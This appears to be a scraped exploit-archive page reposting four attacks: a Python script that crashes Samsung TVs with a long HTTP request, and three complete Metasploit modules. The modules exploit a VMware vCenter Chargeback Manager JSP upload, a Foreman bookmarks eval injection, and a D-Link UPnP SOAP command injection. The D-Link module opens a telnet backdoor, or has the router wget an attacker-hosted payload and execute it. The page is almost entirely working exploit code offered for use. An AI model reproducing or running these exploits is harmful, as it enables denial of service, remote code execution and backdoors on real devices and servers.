vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

Description : The DMCRUIS/0.1 web server on Samsung TVs suffers from a denial of service vulnerability. Author : Malik Messelem Source : Samsung TV Denial Of Service ? Packet Storm Code : #!/usr/bin/python # Exploit Title: Samsung TV Denial of Service (DoS) Attack # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com # Date: 07/21/2013 # CVE Number: CVE-2013-4890 # Vendor Homepage: http://www.samsung.com # Description: # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request # As a results, the TV reboots... # Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware import httplib import sys import os print " ***************************************************************************************" print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n" print " Exploit: Denial of Service (DoS) attack\n" print " Description:\n" print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request." print " Tested successfully on my Samsung PS50C7700 plasma TV \n" print " ***************************************************************************************\n" # Sends the payload print " Sending the malicious payload...\n" conn = httplib.HTTPConnection(sys.argv[1],5600) conn.request("GET", "A"*300) conn.close() # Checks the response print " Checking the status... (CTRL+Z to stop)\n" response = 0 while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!\n"

Description : This Metasploit module exploits a code execution flaw in VMware vCenter Chargeback Manager, where the ImageUploadServlet servlet allows unauthenticated file upload. The files are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed. The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1 on Windows 2003 SP2. Author : Andrea Micalizzi, juan vazquez Source : VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in VMware vCenter Chargeback Manager, where the ImageUploadServlet servlet allows unauthenticated file upload. The files are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed. The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1 on Windows 2003 SP2. }, 'Author' => [ 'Andrea Micalizzi', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3520' ], [ 'OSVDB', '94188' ], [ 'BID', '60484' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-147/' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2', { } ] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2013')) register_options( [ Opt::RPORT(443) ], self.class) end # # Try to find and delete the jsp if we get a meterpreter. # def on_new_session(cli) if not @dropper or @dropper.empty? return end if cli.type != 'meterpreter' print_error("#{@peer} - Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin print_status("#{@peer} - Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? print_error("#{@peer} - Unable to find #{@dropper}. Please manually remove it.") return end files.each { |f| print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } print_good("#{@peer} - #{@dropper} deleted") return rescue ::Exception => e print_error("#{@peer} - Unable to delete #{@dropper}: #{e.message}") end end def upload_file(filename, contents) post_data = Rex::MIME::Message.new post_data.add_part(contents, "image/png", nil, "form-data; name=\"#{rand_text_alpha(4+rand(4))}\"; filename=\"#{filename}\"") # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => normalize_uri("cbmui", "ImageUploadServlet"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => "JSESSIONID=#{@session}" }) if res and res.code == 200 return true else return false end end def check res = send_request_cgi({ 'uri' => normalize_uri("cbmui", "en_US", "themes", "excel", "index.htm"), }) if res and res.code == 200 and res.body =~ /vCenter Chargeback Manager/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" # The JSP dropper is needed because there isn't directory traversal, just # arbitrary file upload to a web path where JSP code execution is allowed. dropper = jsp_drop_and_execute(exe, exe_filename) dropper_filename = rand_text_alpha(8) + ".jsp" if upload_file(dropper_filename, dropper) register_files_for_cleanup(exe_filename) @dropper = dropper_filename else fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed") end print_status("#{@peer} - Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), 'method' => 'GET' }) end # This should probably go in a mixin def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| jspraw << %Q|int numbytes = data.length();\n| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| jspraw << %Q|{\n| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| jspraw << %Q| comb <<= 4;\n| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| jspraw << %Q|}\n| jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| jspraw << %Q|%>\n| jspraw end def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|try {\n| jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| jspraw end def jsp_drop_and_execute(bin_data, output_file) jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end end

Description : This Metasploit module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier). Author : Ramon de C Valle Source : Foreman (Red Hat OpenStack/Satellite) Code Injection ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection', 'Description' => %q{ This module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier). }, 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-2121'], ['CWE', '95'], ['OSVDB', '94671'], ['BID', '60833'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'], ['URL', 'http://projects.theforeman.org/issues/2631'] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => 'Jun 6 2013', 'DefaultOptions' => { 'PrependFork' => true }, 'DefaultTarget' => 0 ) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('USERNAME', [true, 'Your username', 'admin']), OptString.new('PASSWORD', [true, 'Your password', 'changeme']), OptString.new('TARGETURI', [ true, 'The path to the application', '/']), ], self.class ) end def exploit print_status("Logging into #{target_url}...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'users', 'login'), 'vars_post' => { 'login[login]' => datastore['USERNAME'], 'login[password]' => datastore['PASSWORD'] } ) fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil? if res.headers['Location'] =~ /users\/login$/ fail_with(Exploit::Failure::NoAccess, 'Authentication failed') else session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/ fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil? end print_status('Retrieving the CSRF token for this session...') res = send_request_cgi( 'cookie' => "_session_id=#{session}", 'method' => 'GET', 'uri' => normalize_uri(target_uri) ) fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil? if res.headers['Location'] =~ /users\/login$/ fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') else csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i if csrf_param.nil? || csrf_token.nil? csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i end fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil? end payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3) print_status("Sending create-bookmark request to #{target_url('bookmarks')}...") res = send_request_cgi( 'cookie' => "_session_id=#{session}", 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bookmarks'), 'vars_post' => { csrf_param => csrf_token, payload_param => payload.encoded, 'bookmark[controller]' => "eval(params[:#{payload_param}])#", 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3), 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3) } ) end def target_url(*args) (ssl ? 'https' : 'http') + if rport.to_i == 80 || rport.to_i == 443 "://#{vhost}" else "://#{vhost}:#{rport}" end + normalize_uri(target_uri.path, *args) end end

Description : Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the CMD target. Additionally, two targets are included, to start a telnetd service and establish a session over it, or deploy a native mipsel payload. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may affected. Author : Michael Messner, juan vazquez Source : D-Link Devices UPnP SOAP Command Execution ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Auxiliary::CommandShell def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices UPnP SOAP Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the CMD target. Additionally, two targets are included, to start a telnetd service and establish a session over it, or deploy a native mipsel payload. This module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may affected. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '94924' ], [ 'BID', '61005' ], [ 'EDB', '26664' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ] ], 'DisclosureDate' => 'Jul 05 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ [ 'CMD', #all devices { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Telnet', #all devices - default target { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', #DIR-865, DIR-645 and others with wget installed { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1 )) register_options( [ Opt::RPORT(49152), #port of UPnP SOAP webinterface OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), ], self.class) end def exploit @new_portmapping_descr = rand_text_alpha(8) @new_external_port = rand(65535) @new_internal_port = rand(65535) if target.name =~ /CMD/ exploit_cmd elsif target.name =~ /Telnet/ exploit_telnet else exploit_mips end end def exploit_cmd if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded type = "add" res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") type = "delete" res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end return end def exploit_telnet telnetport = rand(65535) vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") cmd = "telnetd -p #{telnetport}" type = "add" res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end type = "delete" res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) if sock print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") add_socket(sock) else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" auth_info = { :host => rhost, :port => telnetport, :sname => 'telnet', :user => "", :pass => "", :source_type => "exploit", :active => true } report_auth_info(auth_info) merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => nil, 'PASSWORD' => nil } start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end return end def exploit_mips downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}" type = "add" res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") type = "delete" res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end end def request(cmd, type) uri = '/soap.cgi' data_cmd = "<?xml version=\"1.0\"?>" data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" data_cmd << "<SOAP-ENV:Body>" if type == "add" vprint_status("#{rhost}:#{rport} - adding portmapping") soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping" data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">" data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>" data_cmd << "<NewLeaseDuration></NewLeaseDuration>" data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>" data_cmd << "<NewEnabled>1</NewEnabled>" data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>" data_cmd << "<NewRemoteHost></NewRemoteHost>" data_cmd << "<NewProtocol>TCP</NewProtocol>" data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>" data_cmd << "</m:AddPortMapping>" else #we should clean it up ... otherwise we are not able to exploit it multiple times vprint_status("#{rhost}:#{rport} - deleting portmapping") soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping" data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">" data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>" data_cmd << "</m:DeletePortMapping>" end data_cmd << "</SOAP-ENV:Body>" data_cmd << "</SOAP-ENV:Envelope>" begin res = send_request_cgi({ 'uri' => uri, 'vars_get' => { 'service' => 'WANIPConn1' }, 'ctype' => "text/xml", 'method' => 'POST', 'headers' => { 'SOAPAction' => soapaction, }, 'data' => data_cmd }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?") end end end end